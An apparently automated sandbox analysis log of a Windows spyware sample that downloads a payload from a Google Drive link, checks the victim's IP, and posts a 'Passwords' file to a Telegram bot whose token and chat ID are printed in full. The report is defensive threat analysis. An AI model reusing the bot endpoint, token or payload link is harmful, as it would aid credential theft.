            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3189d99afcd2Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036D6B000.00000004.00000800.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036E80000.00000004.00000800.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036C8F000.00000004.00000800.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036E80000.00000004.00000800.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036C8F000.00000004.00000800.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036C84000.00000004.00000800.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036D6B000.00000004.00000800.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036E80000.00000004.00000800.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036C11000.00000004.00000800.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2735696215.000000003954D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: ajRZflJ2ch.exe, 00000005.00000002.2735696215.000000003954D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/U9
            Source: ajRZflJ2ch.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036D6B000.00000004.00000800.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036E80000.00000004.00000800.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036D6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382
            Source: ajRZflJ2ch.exe, 00000005.00000003.2404579364.00000000065DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: ajRZflJ2ch.exe, 00000005.00000002.2713839860.0000000006568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: ajRZflJ2ch.exe, 00000005.00000002.2713839860.0000000006568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/O
            Source: ajRZflJ2ch.exe, 00000005.00000002.2713839860.00000000065A2000.00000004.00000020.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2733459678.0000000035D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=17zh6-Wlf0aT1vS8RBy4ZmVv4fH0VS4Vd
            Source: ajRZflJ2ch.exe, 00000005.00000002.2713839860.00000000065A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=17zh6-Wlf0aT1vS8RBy4ZmVv4fH0VS4VdB
            Source: ajRZflJ2ch.exe, 00000005.00000002.2713839860.00000000065D7000.00000004.00000020.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000003.2441082200.00000000065D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: ajRZflJ2ch.exe, 00000005.00000003.2404579364.00000000065DE000.00000004.00000020.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000003.2441082200.00000000065D7000.00000004.00000020.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2713839860.00000000065A2000.00000004.00000020.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2713839860.00000000065C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17zh6-Wlf0aT1vS8RBy4ZmVv4fH0VS4Vd&export=download
            Source: ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: ajRZflJ2ch.exe, 00000005.00000003.2404579364.00000000065DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: ajRZflJ2ch.exe, 00000005.00000003.2404579364.00000000065DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: ajRZflJ2ch.exe, 00000005.00000003.2404579364.00000000065DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: ajRZflJ2ch.exe, 00000005.00000003.2404579364.00000000065DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: ajRZflJ2ch.exe, 00000005.00000003.2404579364.00000000065DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: ajRZflJ2ch.exe, 00000005.00000003.2404579364.00000000065DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: ajRZflJ2ch.exe, 00000005.00000003.2404579364.00000000065DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: ajRZflJ2ch.exe, 00000005.00000003.2404579364.00000000065DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
            Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
            Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
            Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
            Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
            Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
            Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.8:49795 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.8:49801 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49877 version: TLS 1.2
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 0_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040558F
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_004034A5
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 0_2_00404DCC0_2_00404DCC
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 0_2_00406AF20_2_00406AF2
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 0_2_70131B5F0_2_70131B5F
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_00404DCC5_2_00404DCC
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_00406AF25_2_00406AF2
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_000D43285_2_000D4328
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_000D8DA05_2_000D8DA0
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_000D5F905_2_000D5F90
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_000D2DD15_2_000D2DD1
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_36AF76285_2_36AF7628
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_36AFC6385_2_36AFC638
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_36AFCCA05_2_36AFCCA0
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_36AF03AF5_2_36AF03AF
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_36AF331B5_2_36AF331B
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_36AF6EA05_2_36AF6EA0
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_36AF6E915_2_36AF6E91
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_36AFDEE15_2_36AFDEE1
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_36AFE7905_2_36AFE790
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_36AFCCA25_2_36AFCCA2
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_36AFB4EC5_2_36AFB4EC
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_36AFBD9C5_2_36AFBD9C
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_36AFDA895_2_36AFDA89
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_36AFEBF75_2_36AFEBF7
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_36AFEBF45_2_36AFEBF4
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_36AFE3395_2_36AFE339
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_36AFE3475_2_36AFE347
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_36AFB07F5_2_36AFB07F
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_36AF78485_2_36AF7848
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_36AFF0545_2_36AFF054
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_36AFC1F25_2_36AFC1F2
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_36AFB9305_2_36AFB930
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A8A9B05_2_39A8A9B0
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A8A3605_2_39A8A360
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A8BA885_2_39A8BA88
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A8BDF05_2_39A8BDF0
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A89D105_2_39A89D10
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A896C85_2_39A896C8
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A886505_2_39A88650
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A8A9A05_2_39A8A9A0
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A829B85_2_39A829B8
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A851F85_2_39A851F8
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A8F1205_2_39A8F120
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A8F1305_2_39A8F130
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A821085_2_39A82108
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A820F85_2_39A820F8
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A848205_2_39A84820
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A848105_2_39A84810
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A870615_2_39A87061
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A870705_2_39A87070
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A818485_2_39A81848
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A800405_2_39A80040
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A818585_2_39A81858
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A813F05_2_39A813F0
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A843C85_2_39A843C8
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A83B085_2_39A83B08
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A83B185_2_39A83B18
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A863685_2_39A86368
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A87B4F5_2_39A87B4F
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A863585_2_39A86358
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A8A3515_2_39A8A351
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A85AA85_2_39A85AA8
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A85AB85_2_39A85AB8
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A8BA975_2_39A8BA97
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A852085_2_39A85208
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A832685_2_39A83268
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A832585_2_39A83258
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A84DB05_2_39A84DB0
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A84DB25_2_39A84DB2
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A89D005_2_39A89D00
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A825605_2_39A82560
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A8255F5_2_39A8255F
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A825505_2_39A82550
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A81CA05_2_39A81CA0
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A874B85_2_39A874B8
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A81CB05_2_39A81CB0
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A874C85_2_39A874C8
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A86C095_2_39A86C09
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A814005_2_39A81400
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A86C185_2_39A86C18
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A80FA85_2_39A80FA8
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A867B05_2_39A867B0
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A8AFE85_2_39A8AFE8
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A8AFF85_2_39A8AFF8
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A8AFF75_2_39A8AFF7
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A867C05_2_39A867C0
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A85F015_2_39A85F01
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A85F105_2_39A85F10
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A83F705_2_39A83F70
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A83F725_2_39A83F72
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A896B85_2_39A896B8
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A80EB95_2_39A80EB9
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A836C05_2_39A836C0
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A836C25_2_39A836C2
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A82E005_2_39A82E00
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A82E105_2_39A82E10
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A856605_2_39A85660
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A886405_2_39A88640
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A8565F5_2_39A8565F
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39A856505_2_39A85650
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39EBE7C85_2_39EBE7C8
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39EBD6085_2_39EBD608
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39EB6FA05_2_39EB6FA0
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_39EB83285_2_39EB8328
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: String function: 00402C41 appears 51 times
            Source: ajRZflJ2ch.exe, 00000000.00000000.1439290788.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs ajRZflJ2ch.exe
            Source: ajRZflJ2ch.exe, 00000005.00000002.2713839860.00000000065D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ajRZflJ2ch.exe
            Source: ajRZflJ2ch.exe, 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs ajRZflJ2ch.exe
            Source: ajRZflJ2ch.exe, 00000005.00000002.2733988130.0000000036AA7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs ajRZflJ2ch.exe
            Source: ajRZflJ2ch.exeBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs ajRZflJ2ch.exe
            Source: ajRZflJ2ch.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@6/6
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_004034A5
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 0_2_00404850 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404850
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_00402104
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeFile created: C:\Users\user\AppData\Local\IwJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeMutant created: NULL
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeFile created: C:\Users\user\AppData\Local\Temp\nsc8724.tmpJump to behavior
            Source: ajRZflJ2ch.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
